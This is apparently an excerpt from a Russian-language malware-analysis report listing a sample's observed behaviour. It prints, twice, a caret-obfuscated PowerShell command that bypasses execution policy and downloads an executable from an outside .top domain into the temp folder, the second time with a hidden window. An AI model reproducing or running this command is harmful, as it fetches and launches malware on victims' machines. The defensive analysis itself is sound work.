Техническая информация
- http://nxc5.top/battlefield/ как $refq222ssa
- '<SYSTEM32>\cmd.exe' /c P^owe^rSh^el^l -E^xecut^ionPo^licy By^Pas^s -No^Pro^fil^e -co^mma^nd $refq222ssa=$env:temp+'\sperma.exe';(Ne^w-Obj^ec^t Ne^t.We^b^Cli^e^nt).DownloadFile('http://nxc5.top/battlefield/',$refq2...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1912
- %TEMP%\1217197.cvr
- DNS ASK nx##.top
- '<SYSTEM32>\cmd.exe' /c P^owe^rSh^el^l -E^xecut^ionPo^licy By^Pas^s -No^Pro^fil^e -co^mma^nd $refq222ssa=$env:temp+'\sperma.exe';(Ne^w-Obj^ec^t Ne^t.We^b^Cli^e^nt).DownloadFile('http://nxc5.top/battlefield/',$refq2...' (со скрытым окном)